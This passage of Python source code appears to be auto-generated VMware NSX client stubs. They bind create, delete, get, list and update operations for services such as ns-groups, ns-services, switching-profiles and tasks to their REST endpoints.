            query_parameters={'force': 'force'},
            content_type='application/json')

        # -- get ---------------------------------------------------------
        get_input_type = type.StructType('operation-input', {
            'ns_group_id': type.StringType(),
            'populate_references': type.OptionalType(type.BooleanType()),
        })
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/ns-groups/{ns-group-id}',
            path_variables={'ns_group_id': 'ns-group-id'},
            query_parameters={'populate_references': 'populate_references'},
            content_type='application/json')

        # -- list --------------------------------------------------------
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'member_types': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'populate_references': type.OptionalType(type.BooleanType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/ns-groups',
            path_variables={},
            # Query parameter wire names match the field names 1:1.
            query_parameters={name: name for name in (
                'cursor', 'included_fields', 'member_types', 'page_size',
                'populate_references', 'sort_ascending', 'sort_by')},
            content_type='application/json')

        # -- update ------------------------------------------------------
        update_input_type = type.StructType('operation-input', {
            'ns_group_id': type.StringType(),
            'ns_group': _ns_group_ref(),
        })
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/ns-groups/{ns-group-id}',
            request_body_parameter='ns_group',
            path_variables={'ns_group_id': 'ns-group-id'},
            query_parameters={},
            content_type='application/json')

        def _op(input_type, output_type, validate_input, validate_output):
            # validate_*: whether a HasFieldsOfValidator guards that side.
            return {
                'input_type': input_type,
                'output_type': output_type,
                'errors': _std_errors(),
                'input_value_validator_list':
                    [HasFieldsOfValidator()] if validate_input else [],
                'output_validator_list':
                    [HasFieldsOfValidator()] if validate_output else [],
                'task_type': TaskType.NONE,
            }

        operations = {
            'addorremoveexpression': _op(
                addorremoveexpression_input_type, _ns_group_ref(),
                True, True),
            'create': _op(create_input_type, _ns_group_ref(), True, True),
            'delete': _op(delete_input_type, type.VoidType(), False, False),
            'get': _op(get_input_type, _ns_group_ref(), False, True),
            'list': _op(
                list_input_type,
                type.ReferenceType(_MODEL, 'NSGroupListResult'),
                False, True),
            'update': _op(update_input_type, _ns_group_ref(), True, True),
        }
        rest_metadata = {
            'addorremoveexpression': addorremoveexpression_rest_metadata,
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.ns_groups',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _NsProfilesStub(ApiInterfaceStub):
    """REST stub for the ``com.vmware.nsx.ns_profiles`` service.

    Binds the create/delete/get/list/update operations to the NSX
    ``/api/v1/ns-profiles`` endpoints.
    """
    def __init__(self, config):
        # Shorthand for a reference into the NSX model package.
        def _model(name):
            return type.ReferenceType('com.vmware.nsx.model_client', name)

        # Build a vAPI standard-error dict from (id-suffix, class) pairs.
        def _errors(pairs):
            return {
                'com.vmware.vapi.std.errors.' + suffix:
                    type.ReferenceType('com.vmware.vapi.std.errors_client', cls)
                for suffix, cls in pairs
            }

        # Every operation on this service reports the same error set.
        _STD = (
            ('service_unavailable', 'ServiceUnavailable'),
            ('invalid_request', 'InvalidRequest'),
            ('internal_server_error', 'InternalServerError'),
            ('unauthorized', 'Unauthorized'),
            ('not_found', 'NotFound'),
        )

        # Assemble one entry of the ``operations`` table.
        def _op(input_type, output_type, errors, in_validators, out_validators):
            return {
                'input_type': input_type,
                'output_type': output_type,
                'errors': errors,
                'input_value_validator_list': in_validators,
                'output_validator_list': out_validators,
                'task_type': TaskType.NONE,
            }

        # properties for create operation
        create_input_type = type.StructType('operation-input', {
            'ns_profile': _model('NSProfile'),
        })
        create_error_dict = _errors(_STD)
        create_input_value_validator_list = []
        create_output_validator_list = []
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/ns-profiles',
            request_body_parameter='ns_profile',
            path_variables={},
            query_parameters={},
            content_type='application/json'
        )

        # properties for delete operation
        delete_input_type = type.StructType('operation-input', {
            'ns_profile_id': type.StringType(),
            'force': type.OptionalType(type.BooleanType()),
        })
        delete_error_dict = _errors(_STD)
        delete_input_value_validator_list = []
        delete_output_validator_list = []
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/ns-profiles/{ns-profile-id}',
            path_variables={'ns_profile_id': 'ns-profile-id'},
            query_parameters={'force': 'force'},
            content_type='application/json'
        )

        # properties for get operation
        get_input_type = type.StructType('operation-input', {
            'ns_profile_id': type.StringType(),
        })
        get_error_dict = _errors(_STD)
        get_input_value_validator_list = []
        get_output_validator_list = []
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/ns-profiles/{ns-profile-id}',
            path_variables={'ns_profile_id': 'ns-profile-id'},
            query_parameters={},
            content_type='application/json'
        )

        # properties for list operation
        list_input_type = type.StructType('operation-input', {
            'attribute_type': type.OptionalType(type.StringType()),
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_error_dict = _errors(_STD)
        list_input_value_validator_list = []
        list_output_validator_list = []
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/ns-profiles',
            path_variables={},
            query_parameters={
                # Query parameter names pass through unchanged.
                'attribute_type': 'attribute_type',
                'cursor': 'cursor',
                'included_fields': 'included_fields',
                'page_size': 'page_size',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
            },
            content_type='application/json'
        )

        # properties for update operation
        update_input_type = type.StructType('operation-input', {
            'ns_profile_id': type.StringType(),
            'ns_profile': _model('NSProfile'),
        })
        update_error_dict = _errors(_STD)
        update_input_value_validator_list = []
        update_output_validator_list = []
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/ns-profiles/{ns-profile-id}',
            request_body_parameter='ns_profile',
            path_variables={'ns_profile_id': 'ns-profile-id'},
            query_parameters={},
            content_type='application/json'
        )

        operations = {
            'create': _op(create_input_type, _model('NSProfile'),
                          create_error_dict,
                          create_input_value_validator_list,
                          create_output_validator_list),
            'delete': _op(delete_input_type, type.VoidType(),
                          delete_error_dict,
                          delete_input_value_validator_list,
                          delete_output_validator_list),
            'get': _op(get_input_type, _model('NSProfile'),
                       get_error_dict,
                       get_input_value_validator_list,
                       get_output_validator_list),
            'list': _op(list_input_type, _model('NSProfileListResult'),
                        list_error_dict,
                        list_input_value_validator_list,
                        list_output_validator_list),
            'update': _op(update_input_type, _model('NSProfile'),
                          update_error_dict,
                          update_input_value_validator_list,
                          update_output_validator_list),
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.ns_profiles',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _NsServiceGroupsStub(ApiInterfaceStub):
    """REST stub for the ``com.vmware.nsx.ns_service_groups`` service.

    Binds the create/delete/get/list/update operations to the NSX
    ``/api/v1/ns-service-groups`` endpoints.
    """
    def __init__(self, config):
        # Shorthand for a reference into the NSX model package.
        def _model(name):
            return type.ReferenceType('com.vmware.nsx.model_client', name)

        # Build a vAPI standard-error dict from (id-suffix, class) pairs.
        def _errors(pairs):
            return {
                'com.vmware.vapi.std.errors.' + suffix:
                    type.ReferenceType('com.vmware.vapi.std.errors_client', cls)
                for suffix, cls in pairs
            }

        # Base error set; delete/update additionally report ConcurrentChange.
        _STD = (
            ('service_unavailable', 'ServiceUnavailable'),
            ('invalid_request', 'InvalidRequest'),
            ('internal_server_error', 'InternalServerError'),
            ('unauthorized', 'Unauthorized'),
            ('not_found', 'NotFound'),
        )
        _STD_CC = _STD[:3] + (('concurrent_change', 'ConcurrentChange'),) + _STD[3:]

        # Assemble one entry of the ``operations`` table.
        def _op(input_type, output_type, errors, in_validators, out_validators):
            return {
                'input_type': input_type,
                'output_type': output_type,
                'errors': errors,
                'input_value_validator_list': in_validators,
                'output_validator_list': out_validators,
                'task_type': TaskType.NONE,
            }

        # properties for create operation
        create_input_type = type.StructType('operation-input', {
            'ns_service_group': _model('NSServiceGroup'),
        })
        create_error_dict = _errors(_STD)
        create_input_value_validator_list = []
        create_output_validator_list = []
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/ns-service-groups',
            request_body_parameter='ns_service_group',
            path_variables={},
            query_parameters={},
            content_type='application/json'
        )

        # properties for delete operation
        delete_input_type = type.StructType('operation-input', {
            'ns_service_group_id': type.StringType(),
            'force': type.OptionalType(type.BooleanType()),
        })
        delete_error_dict = _errors(_STD_CC)
        delete_input_value_validator_list = []
        delete_output_validator_list = []
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/ns-service-groups/{ns-service-group-id}',
            path_variables={'ns_service_group_id': 'ns-service-group-id'},
            query_parameters={'force': 'force'},
            content_type='application/json'
        )

        # properties for get operation
        get_input_type = type.StructType('operation-input', {
            'ns_service_group_id': type.StringType(),
        })
        get_error_dict = _errors(_STD)
        get_input_value_validator_list = []
        get_output_validator_list = []
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/ns-service-groups/{ns-service-group-id}',
            path_variables={'ns_service_group_id': 'ns-service-group-id'},
            query_parameters={},
            content_type='application/json'
        )

        # properties for list operation
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'default_service': type.OptionalType(type.BooleanType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_error_dict = _errors(_STD)
        list_input_value_validator_list = []
        list_output_validator_list = []
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/ns-service-groups',
            path_variables={},
            query_parameters={
                # Query parameter names pass through unchanged.
                'cursor': 'cursor',
                'default_service': 'default_service',
                'included_fields': 'included_fields',
                'page_size': 'page_size',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
            },
            content_type='application/json'
        )

        # properties for update operation
        update_input_type = type.StructType('operation-input', {
            'ns_service_group_id': type.StringType(),
            'ns_service_group': _model('NSServiceGroup'),
        })
        update_error_dict = _errors(_STD_CC)
        update_input_value_validator_list = []
        update_output_validator_list = []
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/ns-service-groups/{ns-service-group-id}',
            request_body_parameter='ns_service_group',
            path_variables={'ns_service_group_id': 'ns-service-group-id'},
            query_parameters={},
            content_type='application/json'
        )

        operations = {
            'create': _op(create_input_type, _model('NSServiceGroup'),
                          create_error_dict,
                          create_input_value_validator_list,
                          create_output_validator_list),
            'delete': _op(delete_input_type, type.VoidType(),
                          delete_error_dict,
                          delete_input_value_validator_list,
                          delete_output_validator_list),
            'get': _op(get_input_type, _model('NSServiceGroup'),
                       get_error_dict,
                       get_input_value_validator_list,
                       get_output_validator_list),
            'list': _op(list_input_type, _model('NSServiceGroupListResult'),
                        list_error_dict,
                        list_input_value_validator_list,
                        list_output_validator_list),
            'update': _op(update_input_type, _model('NSServiceGroup'),
                          update_error_dict,
                          update_input_value_validator_list,
                          update_output_validator_list),
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.ns_service_groups',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _NsServicesStub(ApiInterfaceStub):
    """REST stub for the ``com.vmware.nsx.ns_services`` service.

    Binds the create/delete/get/list/update operations to the NSX
    ``/api/v1/ns-services`` endpoints.  NSService is a polymorphic model,
    so several validator lists carry a ``HasFieldsOfValidator``.
    """
    def __init__(self, config):
        # Shorthand for a reference into the NSX model package.
        def _model(name):
            return type.ReferenceType('com.vmware.nsx.model_client', name)

        # Build a vAPI standard-error dict from (id-suffix, class) pairs.
        def _errors(pairs):
            return {
                'com.vmware.vapi.std.errors.' + suffix:
                    type.ReferenceType('com.vmware.vapi.std.errors_client', cls)
                for suffix, cls in pairs
            }

        # Base error set; delete/update additionally report ConcurrentChange.
        _STD = (
            ('service_unavailable', 'ServiceUnavailable'),
            ('invalid_request', 'InvalidRequest'),
            ('internal_server_error', 'InternalServerError'),
            ('unauthorized', 'Unauthorized'),
            ('not_found', 'NotFound'),
        )
        _STD_CC = _STD[:3] + (('concurrent_change', 'ConcurrentChange'),) + _STD[3:]

        # Assemble one entry of the ``operations`` table.
        def _op(input_type, output_type, errors, in_validators, out_validators):
            return {
                'input_type': input_type,
                'output_type': output_type,
                'errors': errors,
                'input_value_validator_list': in_validators,
                'output_validator_list': out_validators,
                'task_type': TaskType.NONE,
            }

        # properties for create operation
        create_input_type = type.StructType('operation-input', {
            'ns_service': _model('NSService'),
        })
        create_error_dict = _errors(_STD)
        create_input_value_validator_list = [
            HasFieldsOfValidator()
        ]
        create_output_validator_list = [
            HasFieldsOfValidator()
        ]
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/ns-services',
            request_body_parameter='ns_service',
            path_variables={},
            query_parameters={},
            content_type='application/json'
        )

        # properties for delete operation
        delete_input_type = type.StructType('operation-input', {
            'ns_service_id': type.StringType(),
            'force': type.OptionalType(type.BooleanType()),
        })
        delete_error_dict = _errors(_STD_CC)
        delete_input_value_validator_list = []
        delete_output_validator_list = []
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/ns-services/{ns-service-id}',
            path_variables={'ns_service_id': 'ns-service-id'},
            query_parameters={'force': 'force'},
            content_type='application/json'
        )

        # properties for get operation
        get_input_type = type.StructType('operation-input', {
            'ns_service_id': type.StringType(),
        })
        get_error_dict = _errors(_STD)
        get_input_value_validator_list = []
        get_output_validator_list = [
            HasFieldsOfValidator()
        ]
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/ns-services/{ns-service-id}',
            path_variables={'ns_service_id': 'ns-service-id'},
            query_parameters={},
            content_type='application/json'
        )

        # properties for list operation
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'default_service': type.OptionalType(type.BooleanType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_error_dict = _errors(_STD)
        list_input_value_validator_list = []
        list_output_validator_list = [
            HasFieldsOfValidator()
        ]
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/ns-services',
            path_variables={},
            query_parameters={
                # Query parameter names pass through unchanged.
                'cursor': 'cursor',
                'default_service': 'default_service',
                'included_fields': 'included_fields',
                'page_size': 'page_size',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
            },
            content_type='application/json'
        )

        # properties for update operation
        update_input_type = type.StructType('operation-input', {
            'ns_service_id': type.StringType(),
            'ns_service': _model('NSService'),
        })
        update_error_dict = _errors(_STD_CC)
        update_input_value_validator_list = [
            HasFieldsOfValidator()
        ]
        update_output_validator_list = [
            HasFieldsOfValidator()
        ]
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/ns-services/{ns-service-id}',
            request_body_parameter='ns_service',
            path_variables={'ns_service_id': 'ns-service-id'},
            query_parameters={},
            content_type='application/json'
        )

        operations = {
            'create': _op(create_input_type, _model('NSService'),
                          create_error_dict,
                          create_input_value_validator_list,
                          create_output_validator_list),
            'delete': _op(delete_input_type, type.VoidType(),
                          delete_error_dict,
                          delete_input_value_validator_list,
                          delete_output_validator_list),
            'get': _op(get_input_type, _model('NSService'),
                       get_error_dict,
                       get_input_value_validator_list,
                       get_output_validator_list),
            'list': _op(list_input_type, _model('NSServiceListResult'),
                        list_error_dict,
                        list_input_value_validator_list,
                        list_output_validator_list),
            'update': _op(update_input_type, _model('NSService'),
                          update_error_dict,
                          update_input_value_validator_list,
                          update_output_validator_list),
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.ns_services',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _ServiceConfigsStub(ApiInterfaceStub):
    """REST stub for the ``com.vmware.nsx.service_configs`` service.

    Binds the create/delete/get/list/update operations to the NSX
    ``/api/v1/service-configs`` endpoints.
    """
    def __init__(self, config):
        # Shorthand for a reference into the NSX model package.
        def _model(name):
            return type.ReferenceType('com.vmware.nsx.model_client', name)

        # Build a vAPI standard-error dict from (id-suffix, class) pairs.
        def _errors(pairs):
            return {
                'com.vmware.vapi.std.errors.' + suffix:
                    type.ReferenceType('com.vmware.vapi.std.errors_client', cls)
                for suffix, cls in pairs
            }

        # Every operation on this service reports the same error set.
        _STD = (
            ('service_unavailable', 'ServiceUnavailable'),
            ('invalid_request', 'InvalidRequest'),
            ('internal_server_error', 'InternalServerError'),
            ('unauthorized', 'Unauthorized'),
            ('not_found', 'NotFound'),
        )

        # Assemble one entry of the ``operations`` table.
        def _op(input_type, output_type, errors, in_validators, out_validators):
            return {
                'input_type': input_type,
                'output_type': output_type,
                'errors': errors,
                'input_value_validator_list': in_validators,
                'output_validator_list': out_validators,
                'task_type': TaskType.NONE,
            }

        # properties for create operation
        create_input_type = type.StructType('operation-input', {
            'service_config': _model('ServiceConfig'),
        })
        create_error_dict = _errors(_STD)
        create_input_value_validator_list = []
        create_output_validator_list = []
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/service-configs',
            request_body_parameter='service_config',
            path_variables={},
            query_parameters={},
            content_type='application/json'
        )

        # properties for delete operation
        delete_input_type = type.StructType('operation-input', {
            'config_set_id': type.StringType(),
        })
        delete_error_dict = _errors(_STD)
        delete_input_value_validator_list = []
        delete_output_validator_list = []
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/service-configs/{config-set-id}',
            path_variables={'config_set_id': 'config-set-id'},
            query_parameters={},
            content_type='application/json'
        )

        # properties for get operation
        get_input_type = type.StructType('operation-input', {
            'config_set_id': type.StringType(),
        })
        get_error_dict = _errors(_STD)
        get_input_value_validator_list = []
        get_output_validator_list = []
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/service-configs/{config-set-id}',
            path_variables={'config_set_id': 'config-set-id'},
            query_parameters={},
            content_type='application/json'
        )

        # properties for list operation
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'profile_type': type.OptionalType(type.StringType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_error_dict = _errors(_STD)
        list_input_value_validator_list = []
        list_output_validator_list = []
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/service-configs',
            path_variables={},
            query_parameters={
                # Query parameter names pass through unchanged.
                'cursor': 'cursor',
                'included_fields': 'included_fields',
                'page_size': 'page_size',
                'profile_type': 'profile_type',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
            },
            content_type='application/json'
        )

        # properties for update operation
        update_input_type = type.StructType('operation-input', {
            'config_set_id': type.StringType(),
            'service_config': _model('ServiceConfig'),
        })
        update_error_dict = _errors(_STD)
        update_input_value_validator_list = []
        update_output_validator_list = []
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/service-configs/{config-set-id}',
            request_body_parameter='service_config',
            path_variables={'config_set_id': 'config-set-id'},
            query_parameters={},
            content_type='application/json'
        )

        operations = {
            'create': _op(create_input_type, _model('ServiceConfig'),
                          create_error_dict,
                          create_input_value_validator_list,
                          create_output_validator_list),
            'delete': _op(delete_input_type, type.VoidType(),
                          delete_error_dict,
                          delete_input_value_validator_list,
                          delete_output_validator_list),
            'get': _op(get_input_type, _model('ServiceConfig'),
                       get_error_dict,
                       get_input_value_validator_list,
                       get_output_validator_list),
            'list': _op(list_input_type, _model('ServiceConfigListResult'),
                        list_error_dict,
                        list_input_value_validator_list,
                        list_output_validator_list),
            'update': _op(update_input_type, _model('ServiceConfig'),
                          update_error_dict,
                          update_input_value_validator_list,
                          update_output_validator_list),
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.service_configs',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _SwitchingProfilesStub(ApiInterfaceStub):
    def __init__(self, config):
        """Build the REST stub for ``com.vmware.nsx.switching_profiles``.

        Declares the input/output types, error maps, validators and REST
        metadata for the create/delete/get/list/update operations, then
        hands everything to :class:`ApiInterfaceStub`.
        """
        def _standard_errors():
            # Every operation on this interface declares the same five
            # standard vAPI errors; build a fresh dict per operation.
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            }

        def _profile_struct():
            # Polymorphic payload: any dynamic struct carrying the fields of
            # BaseSwitchingProfile (used for create/update bodies and for
            # create/get/update results).
            return type.DynamicStructType(
                'vmware.vapi.dynamic_struct', {}, VapiStruct,
                [type.ReferenceType('com.vmware.nsx.model_client', 'BaseSwitchingProfile')])

        # -- create: POST a new switching profile --
        create_input_type = type.StructType('operation-input', {
            'base_switching_profile': _profile_struct(),
        })
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/switching-profiles',
            request_body_parameter='base_switching_profile',
            path_variables={},
            query_parameters={},
            content_type='application/json'
        )
        # -- delete: remove a profile by id, optionally unbinding first --
        delete_input_type = type.StructType('operation-input', {
            'switching_profile_id': type.StringType(),
            'unbind': type.OptionalType(type.BooleanType()),
        })
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/switching-profiles/{switching-profile-id}',
            path_variables={'switching_profile_id': 'switching-profile-id'},
            query_parameters={'unbind': 'unbind'},
            content_type='application/json'
        )
        # -- get: fetch a single profile by id --
        get_input_type = type.StructType('operation-input', {
            'switching_profile_id': type.StringType(),
        })
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/switching-profiles/{switching-profile-id}',
            path_variables={'switching_profile_id': 'switching-profile-id'},
            query_parameters={},
            content_type='application/json'
        )
        # -- list: paged/filtered listing of profiles --
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'include_system_owned': type.OptionalType(type.BooleanType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
            'switching_profile_type': type.OptionalType(type.StringType()),
        })
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/switching-profiles',
            path_variables={},
            query_parameters={
                'cursor': 'cursor',
                'include_system_owned': 'include_system_owned',
                'included_fields': 'included_fields',
                'page_size': 'page_size',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
                'switching_profile_type': 'switching_profile_type',
            },
            content_type='application/json'
        )
        # -- update: PUT a full replacement of an existing profile --
        update_input_type = type.StructType('operation-input', {
            'switching_profile_id': type.StringType(),
            'base_switching_profile': _profile_struct(),
        })
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/switching-profiles/{switching-profile-id}',
            request_body_parameter='base_switching_profile',
            path_variables={'switching_profile_id': 'switching-profile-id'},
            query_parameters={},
            content_type='application/json'
        )
        operations = {
            'create': {
                'input_type': create_input_type,
                'output_type': _profile_struct(),
                'errors': _standard_errors(),
                'input_value_validator_list': [HasFieldsOfValidator()],
                'output_validator_list': [HasFieldsOfValidator()],
                'task_type': TaskType.NONE,
            },
            'delete': {
                'input_type': delete_input_type,
                'output_type': type.VoidType(),
                'errors': _standard_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': _profile_struct(),
                'errors': _standard_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [HasFieldsOfValidator()],
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'SwitchingProfilesListResult'),
                'errors': _standard_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [HasFieldsOfValidator()],
                'task_type': TaskType.NONE,
            },
            'update': {
                'input_type': update_input_type,
                'output_type': _profile_struct(),
                'errors': _standard_errors(),
                'input_value_validator_list': [HasFieldsOfValidator()],
                'output_validator_list': [HasFieldsOfValidator()],
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.switching_profiles',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _TasksStub(ApiInterfaceStub):
    def __init__(self, config):
        """Build the REST stub for ``com.vmware.nsx.tasks`` (get and list).

        Declares input types, error maps and REST metadata for the two
        read-only operations and delegates to :class:`ApiInterfaceStub`.
        """
        def _standard_errors():
            # Both operations declare the same five standard vAPI errors;
            # build a fresh dict per operation.
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            }

        # -- get: fetch the properties of one task by identifier --
        get_input_type = type.StructType('operation-input', {
            'task_id': type.StringType(),
        })
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/tasks/{task-id}',
            path_variables={'task_id': 'task-id'},
            query_parameters={},
            content_type='application/json'
        )
        # -- list: paged/filtered listing of tasks --
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'request_uri': type.OptionalType(type.StringType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
            'status': type.OptionalType(type.StringType()),
            'user': type.OptionalType(type.StringType()),
        })
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/tasks',
            path_variables={},
            query_parameters={
                'cursor': 'cursor',
                'included_fields': 'included_fields',
                'page_size': 'page_size',
                'request_uri': 'request_uri',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
                'status': 'status',
                'user': 'user',
            },
            content_type='application/json'
        )
        operations = {
            'get': {
                'input_type': get_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TaskProperties'),
                'errors': _standard_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TaskListResult'),
                'errors': _standard_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'get': get_rest_metadata,
            'list': list_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.tasks',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _TraceflowsStub(ApiInterfaceStub):
    def __init__(self, config):
        """Build the REST stub for ``com.vmware.nsx.traceflows``.

        Declares input/output types, error maps, validators and REST
        metadata for create/delete/get/list and delegates to
        :class:`ApiInterfaceStub`.
        """
        def _standard_errors():
            # Every operation declares the same five standard vAPI errors;
            # build a fresh dict per operation.
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
